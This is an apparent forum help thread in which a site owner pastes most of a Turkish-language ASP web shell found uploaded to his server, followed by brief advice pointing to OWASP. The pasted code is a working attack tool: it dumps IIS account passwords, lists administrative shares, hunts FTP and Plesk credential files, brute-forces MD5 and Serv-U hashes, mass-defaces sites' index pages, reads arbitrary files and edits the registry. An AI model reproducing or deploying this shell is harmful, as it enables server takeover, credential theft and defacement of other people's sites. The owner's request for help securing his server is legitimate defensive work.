yazsoll("<b>INSERT</b> - ekleme")

yazsol("Insert into TABLOADI (stunisimleri) values (deðeleri)<br> Insert into tblAdmin (Name,Pwd,Gruop) values ('alfonso','123456',1)")

yazsoll("<b>UPDATE</b> - editleme")

yazsol("Update TABLOADI set stunadý = 'deðeri' where Stunadý = deðeri <br> Update tblAdmin set Name = 'alfonso' where ID = 1")

yazsoll("<b>DELETE</b> - silme")

yazsol("Delete TABLOADI where Stunadý = deðeri<br>Delete tblAdmin where ID = 1")

yazsoll("<b>DROP</b> - tabloyu komple silme")

yazsol("Drop table TABLOADI <br> Drop Table tblAdmin")

yazsoll("<b>Exes</b> - Fdisk çektirmek için")

yazsol("exec xp_cmdshell(fdisk.exe)")

yazsoll("<b>ShutDown</b> - SQL server kapanýr.")

yazsol("shutdown with nowait")
 

CASE 37 ' Sistem Analizer by alfonso ;) 

on error resume next

Set alfonsoNet = Server.CreateObject("WSCRIPT.NETWORK")

response.write "<center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td width='300'>"

yazorta("<b>Server ýn Bilgileri</b>")

yazsol("OS : <font color=#C6FCBE>"& OS() &"</font>")

yazsol("PC & Oturum Adý : <font color=#C6FCBE>\\"& alfonsoNet.ComputerName &"\"&alfonsoNet.UserName&"</font>")

struser = alfonsoNet.UserName

yazsol("Server : <font color=#C6FCBE>"&request.servervariables("SERVER_NAME")&"</font>")

yazsol("IP : <font color=#C6FCBE>"&request.servervariables("LOCAL_ADDR")&"</font>")

yazsol("HTTPD : <font color=#C6FCBE>"&request.servervariables("SERVER_SOFTWARE")&"</font>")

yazsol("WebRoot : <font color=#C6FCBE>"&request.servervariables("APPL_PHYSICAL_PATH")&"</font>")

yazsol("LogRoot : <font color=#C6FCBE>"&request.servervariables("APPL_MD_PATH")&"</font>")

yazsol("Zaman : <font color=#C6FCBE>"&date()&" - "&time()&"</font>")

yazsol("HTTPs : <font color=#C6FCBE>"&request.servervariables("HTTPS")&"</font>")

response.write "</td><td width='350'>"

yazorta("<b>Serverýn Senden Algýladýklarý</b>")

yazsol("IP : <font color=#C6FCBE>"&request.servervariables("REMOTE_ADDR")&"</font>")

yazsol("Proxy IP : <font color=#C6FCBE>"&request.servervariables("HTTP_X_FORWARDED_FOR")&"</font>")

yazsol("User Agent : <font color=#C6FCBE>"&request.servervariables("HTTP_USER_AGENT")&"</font>")

yazsol("Interface : <font color=#C6FCBE>"&request.servervariables("GATEWAY_INTERFACE")&"</font>")

yazsol("Protocol : <font color=#C6FCBE>"&request.servervariables("SERVER_PROTOCOL")&"</font>")

yazsol("Method : <font color=#C6FCBE>"&request.servervariables("REQUEST_METHOD")&"</font>")

yazsol("Via : <font color=#C6FCBE>"&request.servervariables("HTTP_VIA")&"</font>")

yazsol("Cache Control : <font color=#C6FCBE>"&request.servervariables("HTTP_CACHE_CONTROL")&"</font>")

response.write "</td></tr></table></center>"

on error resume next

Set IIsObject = GetObject ("IIS://localhost/w3svc")

response.write "<br><center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td colspan=2>"

yazorta("<b>IIS Bilgileri</b>")

response.write "</td></tr><tr><td width='50%'>"

yazsol("AnonymousUserName : <font color=#C6FCBE>"&IIsObject.Get("AnonymousUserName")&"</font>")

yazsol("AnonymousUserPass : <font color=#C6FCBE>"&IIsObject.Get("AnonymousUserPass")&"</font>")

response.write "</td><td width='50%'>"

yazsol("WAMUserName : <font color=#C6FCBE>"&IIsObject.Get("WAMUserName")&"</font>")

yazsol("WAMUserPass : <font color=#C6FCBE>"&IIsObject.Get("WAMUserPass")&"</font>")

Set IIsObject = Nothing

response.write "</td></tr><tr><td colspan=2>"

yazorta("<a href='"&FilePath&"?mode=38&konum="&konum&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">..:: Açýklama Ýçin Týklayýnýz.. by alfonso  ::..</a>")

response.write "</td></tr></table></center>"

strServer = alfonsoNet.ComputerName

set objFs = GetObject("WinNT://" _

& strServer & "/LanmanServer,FileService")

response.write "<br><center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td width=260>"

yazorta(" <b>Server' in Paylaþýma Açýk Klasörleri by alfonso </b>")

yazsol("<a href='"&FilePath&"?konum=//"&strServer&"/C$'>\\"&strServer&"\C$</a>")

yazsol("<a href='"&FilePath&"?konum=//"&strServer&"/Admin$'>\\"&strServer&"\Admin$</a>")

For Each objShare In objFs

yazsol("<a href='"&FilePath&"?konum=//"&strServer&"/"&objShare.name&"'>\\"&strServer&"\"&objShare.name&"</a>")

Next

response.write "</td></tr></table></center>"
 

response.write "<br><center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td>"

yazorta("<b> Uzakdan Serv-U & GeneFtp & UsersTxT Eriþimi SOnucu  by alfonso </b>")

alfonsoServuRemote()

yazorta("<b>Geliþmiþ Arama için</b>")

yazorta("<a href='"&FilePath&"?konum=C:\Program Files\&hacked=serv&Time="&time&"&mode=23'>Serv_U</a> - <a href='"&FilePath&"?konum=C:\Program Files\&hacked=Daemon&Time="&time&"&mode=23'>Daemon</a> - <a href='"&FilePath&"?konum=C:\&hacked=ws_ftp&Time="&time&"&mode=23'>Ws_Ftp</a> - <a href='"&FilePath&"?konum=C:\&hacked=base.ini&Time="&time&"&mode=23'>Base.ini</a> - <a href='"&FilePath&"?konum=C:\Program Files\&hacked=remote.ini&Time="&time&"&mode=23'>Remote.ini</a>")

response.write "</td></tr></table></center>"
 

response.write "<br><center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td>"

yazorta("<b> Uzakdan PLESK Eriþimi SOnucu by alfonso </b>")

alfonsoPleskRemote()

response.write "</td></tr></table></center>"
 

On error resume next

response.write "<br><center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td>"

yazorta("<b> Vti_Pvt/Access.Cnf & Postinfo & ServicePwd Sonucu by alfonso</b>")

alfonsoVti_Pvt()

yazorta("<b>Geliþmiþ Arama için</b>")

local = request.servervariables("APPL_PHYSICAL_PATH")

yazorta("<a href='"&FilePath&"?konum="&local&"\..\..\&hacked=access.cnf&Time="&time&"&mode=23'>access.cnf</a> - <a href='"&FilePath&"?konum="&local&"\..\..\&hacked=postinfo&Time="&time&"&mode=23'>postinfo</a> - <a href='"&FilePath&"?konum="&local&"\..\..\&hacked=service.pwd&Time="&time&"&mode=23'>service</a>")

response.write "</td></tr></table></center>"
 

On error resume next

response.write "<br><center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td>"

yazorta("<b> NTUser.Dat - Log - Ýni Eriþim Sonucu by alfonso </b>")

alfonsoaNTUser(struser)

response.write "</td></tr></table></center>"
 

On error resume next

response.write "<br><center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td>"

yazorta("<b> Config Klasör Eriþim Sonucu by alfonso</b>")

alfonsosam()

response.write "</td></tr></table></center>"

Call Hata
 
 

On error resume next

response.write "<br><center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td>"

yazorta("<b> Repair Klasör Eriþim Sonucu by alfonso</b>")

alfonsoRepair()

response.write "</td></tr></table></center>"

Call Hata
 

nolist = True
 

CASE 38 ' IIS bilgi Alaný by alfonso

yazsol("WÝndows Server lardaki, himeti sunan, IIS servisi, sizi AnonymousUserName ve o þifre ile tanýr. Sizin yetkiniz o kullanýcýdadýr. ")

yazsoll("IIS içinde ise, o siteninde BEllekdeki Oturum adýda -> WAMUserName adýnda ve þifresine sahiptir.")

yazsoll("Bu Sistem Geliþtirilmeye Devam ediyor? ")
 

CASE 39 ' Seçmece bunlar MD5- servu =) by ALFONSO

response.write "<br><br><br><br><br><center><table width='100%' bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td><form action='"&FilePath&"?mode=40' method=post>"

yazorta("<b> Kýrmak Ýstediðin Türü Seç</b>")

yazorta("<input name='islem' style='color=#C6FCBE' value=' ..::  MD5  ::.. ' type='Submit'> <input name='islem' style='color=#C6FCBE' value=' ..::  Serv-U  ::.. ' type='Submit'>")

response.write "</form></td></tr></table></center>"

yazsol("<b>MD5 :</b> Bildiðiniz üzere, bir çok sistemin kullandýðý bir þifreleme olayýdýr. 128 bittir.")

yazsol("<b>Serv-U :</b> Server larda Host larýn kullandýðý bir programdýr. Kolay vede kullanýþlý olduðu için Hostlar tarafýndna tercih edilir. içinde Ftp þifreleri barýndýrmakdadýr. burdada o Þifreleri kýrmaktadýr.")

yazsoll("<font color=#C6FCBE >Bizde burda ASP tabanlý vede FSO içine injecte edip Sizlere Server ýn CPU ve RAM ini kullanarak , Daha hýzlý ve zahmetsiz, TÝmeOUT suz bir þekilde Þifreleirni kýrmanýzý saðlayacaðýz. Bu Kýrma iþlemi BRUTE attackl modelidir. Kýsacasý Kýrma olasýðý eðer ki sabreder ve þansýnýz varsa çok kýsa sürede kýrarsýnýz. Ama aksi halde 1 gün geçsede =) yinede %100 kýrmöa garantisi vardýr. Eðer derleri doðru girerseniz.</font>")

yazortaa("Md5 & Serv-U KOd Converted by <b>Fastboy</b>")

Yazorta("Brute And HJACk Algorithms Written by <b>alfonso</b>")
 

CASE 40 ' Md5 & Serv-U Algortitmasý Baþlýyor Sýký tutnun =) sakýn dudaðýnýz uçuklamaýsn haa =) by alfonso euheuh çok yordu be kafamý bu olay .. neyse çözdük yine =) eeheuh by alfonso

response.write "<center><table width='100%' bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td><form action='"&FilePath&"?mode=41' method=post>"

if islem = " ..::  MD5  ::.. " then

yazorta("<b> __==  MD5 Cracker by alfonso  ==__ </b>")

else

yazorta("<b> __==  Serv-U Cracker by alfonso  ==__ </b>")

end if

if islem = " ..::  MD5  ::.. " then

yazsol("MD5 Kodu Girin 1 : <input style='color=#C6FCBE' size='54' name='Usersmd5' value='Hash kod u giriniz çözülecek olan.' type='text'>")

else

yazsol("Serv-u Ham Kodu Girin 1 : <input style='color=#C6FCBE' size='45' name='Usersmd5' value='Hash kod u giriniz çözülecek olan.' type='text'>")

yazsol("Salt Kodu : <input style='color=#C6FCBE' size='30' name='salt' value='ww' type='text'>")

end if

response.cookies("mdd") = ""

response.cookies("hash1") = ""

response.cookies("hash2") = ""

response.cookies("hash3") = ""

response.cookies("hash4") = ""

response.cookies("hash5") = ""

response.cookies("hash6") = ""

response.cookies("hash7") = ""

response.cookies("hash8") = ""

response.cookies("hash9") = ""

response.cookies("hash10") = ""

yazsol("Hash 2 : <input style='color=#C6FCBE' size='54' name='hash2' value='' type='text'>")

yazsol("Hash 3 : <input style='color=#C6FCBE' size='54' name='hash3' value='' type='text'>")

yazsol("Hash 4 : <input style='color=#C6FCBE' size='54' name='hash4' value='' type='text'>")

yazsol("Hash 5 : <input style='color=#C6FCBE' size='54' name='hash5' value='' type='text'>")

yazsol("Hash 6 : <input style='color=#C6FCBE' size='54' name='hash6' value='' type='text'>")

yazsol("Hash 7 : <input style='color=#C6FCBE' size='54' name='hash7' value='' type='text'>")

yazsol("Hash 8 : <input style='color=#C6FCBE' size='54' name='hash8' value='' type='text'>")

yazsol("Hash 9 : <input style='color=#C6FCBE' size='54' name='hash9' value='' type='text'>")

yazsol("Hash 10 : <input style='color=#C6FCBE' size='54' name='hash10' value='' type='text'>")

yazsol("Þifre Aralýðý :  <input style='color=#C6FCBE' size='5' name='ara1' value='5' type='text'>  ile  <input style='color=#C6FCBE' size='5' name='ara2' value='18' type='text'> arasýnda...")

yazsol("Deneme Sayýsý :  <input style='color=#C6FCBE' size='5' name='inject1' value='100' type='text'> (1 keredeki deneme sayýsý)")

yazsoll("<b>CharSet i seçiniz;</b>")

yazsol("<input name='k1' value='k1' type='checkbox' checked > ABCDEFGHIJKLMNOPQRSTUVWXYZ")

yazsol("<input name='k2' value='k2' type='checkbox'  > abcdefghijklmnopqrstuvwxyz")

yazsol("<input name='k3' value='k3' type='checkbox' checked > 0123456789")

yazsol("<input name='k4' value='k4' type='checkbox'  > !@#$%^&*()-_+=~`[]{}|\:;<>,.?/")

yazsol("Bekleme Süresi : <input style='color=#C6FCBE' name='waiting' value='2' type='text' size='5'> saniye")

yazorta("<input name='mode' value='41' type='hidden'><input name='md5kirgecirmahvetalfonso' style='color=#C6FCBE' value='  __==  Kýrmaya Baþla  ==__ ' type=submit>")

response.write "</td></tr></form></table></center>"

if islem = " ..::  MD5  ::.. " then

yazsol("<b>MD5 Kodu Girin :</b> MD5 HASh þifrenizi giriniz oraya.. maksimum 10 Hash girebilirsiniz.")

else

yazsol("<b>Serv-u Ham Kodu Girin :</b> Serv-u Kodunun ilk 2 karakteri SALT dur. egri kalaný ise MD5 halidir. Oraya ilk 2 karakteri çýkarýn ve geri kalaný yazýn. altasa da SALT kýsmýnada, ilk 2 karakteri yazýn. Max 10 Hash girebilirsiniz.")

end if

yazsol("<b>Þifre Aralýðý :</b> Burda belirtilen aralýklar arasýnda þifre üretip, denemeye baþlýcaktýr. önce küçükden baþlayýp, tüm charset denemsini yaptýkdan sonra, aralýk bir artacaktýr, taaki sizin üst sýnýra kadar girdiðiniz.")

yazsol("<b>CharSet i seçiniz; </b> Þifre denerkenki, Þifre karakterleridir. Büyük küçük harf önemlidir. Birden FAzla da seçebilriisniz. Ama unutmayýnki, Deneme sayýsý büyüdükçe, Zamanda ARTACAKTIR. ")

yazsol("<b>Bekleme Süresi :</b> Sürekli md5 deneme yaparsa sistem, büyük bir oranda Cpu kullanýr. Cpu kullanýmý rahatlatmak için vede timeout u önlemek için , her bir Charset uzunluðu kadar deneyip, sonra yenileme yapýyor. o sýradaki bekleme süresidir bu.")

yazsol("<b>NOT :</b> Toplu Md5&ServU kýrmak mümkün. Hepsini birden kullandýðýnýzda verim artacaktýr. HIZ da düþüþ olmaz. Ama sizin Daha kolay kýrmanýzý saðlar, Çoklu kýrma.")
 

CASE 41 ' MD5 deneniyorrrrrr by alfonso

' yerel deðiþkenelrim 

on error resume next

if request.cookies("mdd") = "0" or request.cookies("mdd") = ""  then

	session("say") = 1

	Call Cookyaz("hash1","has1",Usersmd5)

	Call Cookyaz("hash2","has2",hash2)

	Call Cookyaz("hash3","has3",hash3)

	Call Cookyaz("hash4","has4",hash4)

	Call Cookyaz("hash5","has5",hash5)

	Call Cookyaz("hash6","has6",hash6)

	Call Cookyaz("hash7","has7",hash7)

	Call Cookyaz("hash8","has8",hash8)

	Call Cookyaz("hash9","has9",hash9)

	Call Cookyaz("hash10","has10",hash10)

	inject4 = CInt(session("say"))

	inject3 = 0

end if
 

increment = 0

sifre = ""

hashing = ""

goup=0

getend=0
 

if inject4 = inject3 then

	response.write ("<script>alert(""Mükemmel Tüm þifreler Kýrýldý ;) by alfonso "")</script>")

	response.end()

end if

	

if coding ="" then ' kod oluþtur

	coding = kodolustur(ara1)

end if
 

coding = replace(coding,"x","#")
 

if dizi = "" then ' Charset i oluþuturuyorum..

	dizi = diziolustur()

end if
 

Call HashFounded("hash1","has1")

Call HashFounded("hash2","has2")

Call HashFounded("hash3","has3")

Call HashFounded("hash4","has4")

Call HashFounded("hash5","has5")

Call HashFounded("hash6","has6")

Call HashFounded("hash7","has7")

Call HashFounded("hash8","has8")

Call HashFounded("hash9","has9")

Call HashFounded("hash10","has10")
 

for t=1 to inject1

sifre = Sifreyarat(coding,ara1,dizi)

if salt = "" then

	md5li=UCASE(md5(sifre))

	response.write sifre &" - "& md5li & "<br>"

else

	md5li=UCASE(md5(salt+sifre))

	response.write salt+sifre &" - "& md5li & "<br>"

end if
 

Call hashyes("hash1","has1",md5li,sifre)

Call hashyes("hash2","has2",md5li,sifre)

Call hashyes("hash3","has3",md5li,sifre)

Call hashyes("hash4","has4",md5li,sifre)

Call hashyes("hash5","has5",md5li,sifre)

Call hashyes("hash6","has6",md5li,sifre)

Call hashyes("hash7","has7",md5li,sifre)

Call hashyes("hash8","has8",md5li,sifre)

Call hashyes("hash9","has9",md5li,sifre)

Call hashyes("hash10","has10",md5li,sifre)
 

coding = SonrakiAdim(coding,ara1,dizi)

'response.flush

next

coding = replace(coding,"#","x")

if CInt(ara1) <> CInt(ara2)+1 then

response.write "<META http-equiv=refresh content="&waiting&";URL='"&FilePath&"?mode=41&ara1="&ara1&"&ara2="&ara2&"&dizi="&dizi&"&coding="&coding&"&waiting="&waiting&"&inject1="&inject1&"&salt="&salt&"&inject4="&inject4&"&inject3="&inject3&"'>"

end if

response.flush
 

CASE 42 'MSWC nesnesi kullanýmý. Permision geçme adýna attýðým bir adamdýr. bu nesnenin olduðunu "Scorlex" den edindim. Araþtýrdým neler yaparým diye =) iþte görün neler yapýlabiliyormuþuz ;) bununla. uehueh by alfonso

response.write "<table width=""100%"" class=""kbrtm""><tr valign=""top""><td colspan=""2"" align=""center"">"

tablo30("<b>Hacking with Using MSWCTools 1.0 by alfonso ;)</b>")

yazsol("<form action='"&FilePath&"?mode=43' method=post><b>Ýndex Yeri : </b><input name='hash2' type='text' value='"&FilePath&"' size=50> (Ýndexin Serverdaki virtual yeri)")

yazsol("<input type=radio name='hash4' checked value='tek'> <b>Atýlacak Yer: </b><input name='hash3' type='text' value='default.asp' size=50> (Tek bir yere Yaz.)")

yazsol("<input type=radio name='hash4' value='multi'> <b>MASS Konum: </b><input name='hash6' type='text' value='.\' size=50> (Mass yapýlacak dizin)")

yazsol("<b>Eklencek Klasör: </b><input name='hash5' type='text' value='httpdocs\' size=25> (Ek Klasör girdisi -  BOÞ býrakýn , bilmiyorsanýz)")

yazorta("<input name='Gönder_Ej_De_r' value='Yazdýr koçumm ;) by alfonso' type='submit'")

response.write "</td></tr></table></form>"

yazorta("<b>Kullanýmý by alfonso</b>")

yazsol("Önecelikle, FSO nesnesi kullanmadan bir dosyayý , istenilen yere MSWC nesnesi ile yazdýrýlanabiliniyor. FSO desteði olmayan bir server da bile, rahatça bu nesne yardýmý ile index atabilirsiniz. Kimi serverlarda, permison engeline takýlýrýz yada klsörü içine giremeyiz, yada FSO kullanýmý kýsýtlýdýr. bunlarý AÞMAK için bu nesneyi kullandým. Bu nesne þu an localhost ve 1-2 yerde çalýþtý saðlýklý þekilde. Þu an TEst sürümünde diyebilirim. Umarým bu bizim permison =) geçme yollumuzu aydýnlatýr ne dersiniz :)) uehueh")

yazsol("<b>index yeri -></b>Burayý fiziksel yeri YAZMAYIN SAKIN. oraya indexinizin virtual yerini yani. Kullandýðýnýz FSO dizinine olan KONUMUNU yazýn indexin yani. Bu fso ile ayný yerde ise, 'hacked.html' eðer alt klasörde ise -> '..\hacking.html', '..\..\..\alfonso\www\hacking.html',yada \news\hacking.html gibi belirtmeniz gerek.Konumunu böyle belirlemeniz gerekiyor. 'C:\ss\ss\hacking.html' yaptýðýnýzda iþlem gerçekleþmezz.. <b>YADA size ÖNERÝm -> kullandýðýnýz FSo yu istediðinzi yere server daki bir baþkas siteye copyalatýrrýsanýz , , bu sefer fso yu o site üzeridnen çalýþtýrrýrsanýz PErmsion ý aþmýþ olursunuz o site için.</b>")

yazsol("<b>Atýlacak yer ->></b> TEK bir hedef için. Burayýda ..\..\ þeklinde inerek belirtmeniz gerekiyor.mesela '..\..\..\index.asp' 3 dizin aþaðýya iner ve index i atar yada '..\..\..\www\index.asp'  3 dizin iner ww dizine girer , index i atar. =) böyle OLAMAK zorunda .  ")

yazsol("<b>MASS Konum  ->></b> BUrda çoklu alt klasörlerede index atmak için geliþtirdim. '..\..\..\' þeklinde aþaðýlara inin ve TÜM sietelerin LÝStelendiði klasör ee kadar olan '..\' iþaretini ayarlayýn. mesela 3 dizin aþaðýda ise FSO olan uzaklýðý, '..\..\..\'  yazýn yeterdir =) . <b>Eklenecek klasör-></b> burda da, TÜm sietlere giriþ yapýldýkdan sonraki Klasör adý , mesela 'www' yada 'http' yada 'wwwroot'  gibi.")

yazsol("Neden böyle derseniz, MSWC nin kullanýmý, destekleidði þekil böyledir. Biraz kafa karýþtýrýcý. Ama ben denedim gördüm =) memnun kaldým. O yüzden bu FSO da yerini aldý. Þundan eminimki kullanýmýný deneyerek öðrendiðinizde, sizinde PErmsion geçmede vazgeçilmeziniz olacakdýr =) euheuh")

yazorta("Biraz zor oldu be  <b>ALFONSO</b> for giving idea about MSWC Component")

yazorta("<b>Coding & Development & Algorithms Made by alfonso</b>")
 

CASE 43 'MSWC iþleniyor =)

on error resume next

Set utils = Server.CreateObject("MSWC.Tools")

if err <> 0 then

	olmadi("MSWC.tools desteði yoktur bu serverýn.")

end if

if hash4 = "tek" then

	on error resume next

	utils.ProcessForm hash3, hash2

	if err <>0 then

		olmadi("Baþarýsýz. Belirtiðiniz virtual path lar doðrumu emin olun. MSWC desteði var çünkü server ýn.")

	else

		oldu("Baþardýnýz ;) iþlem gerçekleþtii.")

	end if

else 

on error resume next

Set f = FSO.GetFolder(FolderPath)

Set fc = f.SubFolders

if err<>0 then

	olmadi("bu klasör e FSo nesnesi ile tarama yapýlamýyor. Önce okunmalý, sonra MSWC devreye girer.")

end if

For Each f1 In fc

	on error resume next

	mevki = hash6+f1.name+"\"+hash5+"default.asp"

	utils.ProcessForm mevki, hash2

	mevki = hash6+f1.name+"\"+hash5+"index.asp"

	utils.ProcessForm mevki, hash2

	mevki = hash6+f1.name+"\"+hash5+"default.htm"

	utils.ProcessForm mevki, hash2

	mevki = hash6+f1.name+"\"+hash5+"index.html"

	utils.ProcessForm mevki, hash2

	mevki = hash6+f1.name+"\"+hash5+"alfonso.html"

	utils.ProcessForm mevki, hash2		

	mevki = hash6+f1.name+"\"+hash5+"index.htm"

	utils.ProcessForm mevki, hash2	

	if err<>0 then

	response.write "<table width=""100%""><tr><td class=""kbrtm""> "& hash6+f1.name+"\"+hash5&" <font color=#FE7A84> Noo :( !! <font class=""k1"">û</font></td></tr></table>"

	else

	response.write "<table width=""100%""><tr><td class=""kbrtm""> "& hash6+f1.name+"\"+hash5&" <font color=#C6FCBE> OK !! <font class=""k1"">ü</font></td></tr></table>"

	end if

	response.flush

Next

yazorta("<b>Ýþlem Tamamlandý. by alfonso ;)</b>")

end if
 

CASE 44 'XMLHTTP lý dosya okuma.

if inject2 = "ok" then

mevki = hash2

else

mevki = Fullpath

end if

response.write "<table width=""100%"" class=""kbrtm""><tr valign=""top""><td colspan=""2"" align=""center"">"

tablo30("<b>Reading Files by using XMLHTTP 1.0 by alfonso ;)</b>")

yazsol("<form action='"&FilePath&"?mode=44' method=post><input name='inject2' value='ok' type='hidden'><b>Dosya Adresi : </b><input name='hash2' type='text' value='"&mevki&"' size=60><input name='goruntule_by_A_l_f_o' value='.: Görüntüle :.' type='submit'>")

response.write "</td></form></tr></table>"

if not inject2 = "ok" then

yazsol("<b>XMLHTTP</b> Component ini kullanmaktadýr. kullanýmý çok kolay. Server daki istediðiniz dosyanýn fiziksel link ini yazarak , içini görüntüleyebilirsiniz.")

yazsol("Bir server a girdiniz. FSO ile okuma yetkiniz yok bir dizinde, fakat orda dosyalar mevcut. HTTP üzerinden ulaþabiliyorusnuz fakat server içinden PERMission denied diyor. o zaman direk burdan fiziksel link ini yazarakdan ulaþýrýýz. BUNU 'confing.asp' 'common.asp' 'sql.asp' gibi dosyalarda uygulayarak SQL baðlantýlar yada MDB yerlerini öðrenebiliriz. Hatta ASp kodlar içindeki Admin þirfeleri gibi kritik þifrrelerde dahil. SQL injeciotn yapacaksanýzda, Tablo larý , kullanýþan sql komularada ulaþabilirsiniz.  ")

else

response.write "<textarea style='width:100%;height:470;' >"

on error resume next

Set alfonso = Server.CreateObject("Microsoft.XMLHTTP")

alfonso.Open "GET", hash2, false

alfonso.Send 

if err=0 then

Response.Write Server.HTMLEncode(alfonso.ResponseText)

else

response.write "Yazdýðýnýz adres bulunamadý . ?? bir kontrol yap by alfonso ;)"

end if

response.write "</textarea>"

end if

yazorta("<b>by alfonso ;)</b>")
 

CASE 45 'Registiry Editör  =) by    A L F O N S O   F E E L    T H E    P O W E R   O F   T U R K S

response.write "<table width=""100%"" class=""kbrtm""><tr valign=""top""><td colspan=""2"" align=""center"">"

tablo30("<b>REGISTRY EDITOR 2.0 by alfonso ;)</b>")

tablo30("<br><b>REGister lara YAzma & Ekleme</b>")

yazsol("<form action='"&FilePath&"?mode=45' method=post><input name='inject2' value='yaz' type='hidden'><b>Mevki/Key : </b><input name='hash2' type='text' value='' size=85><br> (örnek: HKLM\SOFTWARE\Microsoft\ALFONSO.COM)")

yazsol("Deðer/Value: <input name='hash3' value='' type='text'>")

yazsol("TÜr/Type: <select name='hash4'><option value=1>REG_SZ</option><option value=2>REG_DWORD</option><option value=3>REG_BINARY</option><option value=4>REG_EXPAND_SZ</option><option value=5>REG_MULTI_SZ</option></select> &nbsp;&nbsp;&nbsp;&nbsp;  <input name='SaVSA_K_CoM' value='..:: YAZDIR ::..' type='Submit'>")

response.write "</td></form></tr></table>"

yazsol("<table><tr><td>Root Key Name</td><td>Karþýlýðý</td></tr><tr><td>HKEY_CURRENT_USER</td><td>HKCU</td></tr><tr><td>HKEY_LOCAL_MACHINE</td><td> HKLM </td></tr><tr><td>HKEY_CLASSES_ROOT</td><td>HKCR</td></tr><tr><td>HKEY_USERS</td><td>HKEY_USERS </td></tr><tr><td>HKEY_CURRENT_CONFIG</td><td>HKEY_CURRENT_CONFIG </td></tr></table>")

yazsol("REG_SZ -> String(kelime) / REG_DWORD -> Ýnteger(Sayý) / REG_BINARY -> Binary / REG_EXPAND_SZ -> Multi String / REG_MULTI_SZ -> Aeeay String")

response.write "<table width=""100%"" class=""kbrtm""><tr valign=""top""><td colspan=""2"" align=""center"">"

tablo30("<br><b>Register lardan OKUMA & SÝL Coded by alfonso ;)</b>")

yazsol("<form action='"&FilePath&"?mode=45' method=post><input name='inject2' value='oku' type='hidden'><b>Mevki/Key : </b><input name=""hash5"" type='text' value='' size=85><br> (örnek: HKLM\SOFTWARE\Microsoft\alfonso_WAS_HERE)")

yazorta("<input value='oku' name='hash6' type='radio' checked> OKU  -  <input value='sil' name='hash6' type='radio'> SÝL &nbsp;&nbsp;&nbsp;&nbsp;  <input name='SaVSA_K_CoM_' value='..:: OKU/SÝL ::..' type='Submit'>")

response.write "</td></form></tr></table>"

on error resume next

Set SaVSaK = Server.CreateObject("WScript.Shell")

	if err <> 0 then

		olmadi("Server da WScript.SHell kullanýmýna Ýzin vermemektedir. Ýþlem baþarýsýz.")

		response.end()

	end if

if inject2 = "yaz" then

	on error resume next

	Select Case CInt(hash4)

		Case 1

			hash9 = SaVSaK.RegWrite (Trim(hash2), Trim(hash3), "REG_SZ")

		Case 2

			hash9 = SaVSaK.RegWrite (Trim(hash2), CInt(Trim(hash3)), "REG_DWORD")

		Case 3

			hash9 = SaVSaK.RegWrite (Trim(hash2), CInt(Trim(hash3)), "REG_BINARY")

		Case 4

			hash9 = SaVSaK.RegWrite (Trim(hash2), Trim(hash3), "REG_EXPAND_SZ")

		Case 5

			hash9 = SaVSaK.RegWrite (Trim(hash2), Trim(hash3), "REG_MULTI_SZ")

	End Select

	if err <> 0 then

		olmadi("Ýþlem  gerçekleþtirilemedi. VALUE deðerinin doðru ve uygun Value giridðinziden emin ol.")

	else

		oldu(" <b>"+hash2+"</b><br> adresine register yazýldý. ")

	end if
 

else if inject2 = "oku" then

	if hash6 = "oku" then

		yazorta("Mevki/Key: <b>"&Trim(hash5)&"</b>")

		on error resume next

		response.write "<center>Deðer/Value: <b>"

		response.write SaVSaK.RegRead (Trim(hash5))

		response.write "</b></center>"

		if err<>0 then

			olmadi("Kayýt Register larda bulunamadý...")

		end if		

	else if hash6 = "sil" then

		yazorta("Mevki/Key: <b>"&Trim(hash5)&"</b>")

		on error resume next

		hash9 = SaVSaK.RegDelete (Trim(hash5))

		if err<>0 then

			olmadi("Registerlardan Silinemedi. KEy yanlýþ olabilir. yada kayýt bulanamadý.")

		else

			oldu("Baþarýyla Silindi. ")

		end if

	end if 

	end if
 

end if

end if

yazortaa("<b>Coded by ALFONSO - Cyber-Warrior</b>")
 
 

END SELECT
 
 

if popup = False AND nolist = False then

response.write "<br><br>"

response.write "<div  style=""z-index:150; position:absolute"">"

Call KlasorOku()

response.write "</div><div  align=""right"">"

Call DosyaOku()

response.write "</div>"

end if
 

if popup = False then

response.write "<br><br><center><table cellpadding=""0"" cellspacing=""0"" width=""160"">"

response.write "<tr><td class=""kbrtm"" height=""20"" style=""background-color:121212"" align=""center""><b>Sürücüler</b></td></tr>"

Call Suruculer

response.write "</table></center><br><br>"

Call SurucuInfo

yazortaa("<b>Coded by <a href=""mailto:cwalfonso@hotmail.com"">alfonso</a> - <a href=""http://www.allah.cc"" target=_blank"">ALLAH.CC</a></b>")

yazorta("<b>ALFONSO was here</a><br>Speacial Thanks to CW</b>")

end if

%>

Open in new window

0
Comment
Question by:renoduke
  • 4
  • 3
7 Comments
 
LVL 41

Expert Comment

by:ralmada
ID: 24336819
 

Please check OWASP website for secure coding standards:

1) Top ten Web application vulnerabilities
 http://www.owasp.org/index.php/Top_10_2007

2) Secure coding standards:
http://www.owasp.org/index.php/OWASP_Guide_Project  

Also check the PCI Data Security Standards for more best practices:
3) https://www.pcisecuritystandards.org/security_standards/supporting_documents.shtml
0
 
LVL 1

Author Comment

by:renoduke
ID: 24344300
Some additional information.  We use aspx pages.  We have 2 stored procedures that display products on our web site.  The sql user that executes only has execute permission on the sp's and only select on the table in question.  The sql user has no other permission.  I have changd the sa password.

IIS only has read permission on the directory.  No browse permission has been allowed through IIS.  

There must be an obvious step we we are over looking that allows the uploads of these files.

We appreciate any help on what we should look for to plug this security hole.
Thank you
0
 
LVL 41

Expert Comment

by:ralmada
ID: 24344323
Please read the suggested link.
 Otherwise you will have to hire a Web application security professional to review your site.
 
0
How your wiki can always stay up-to-date

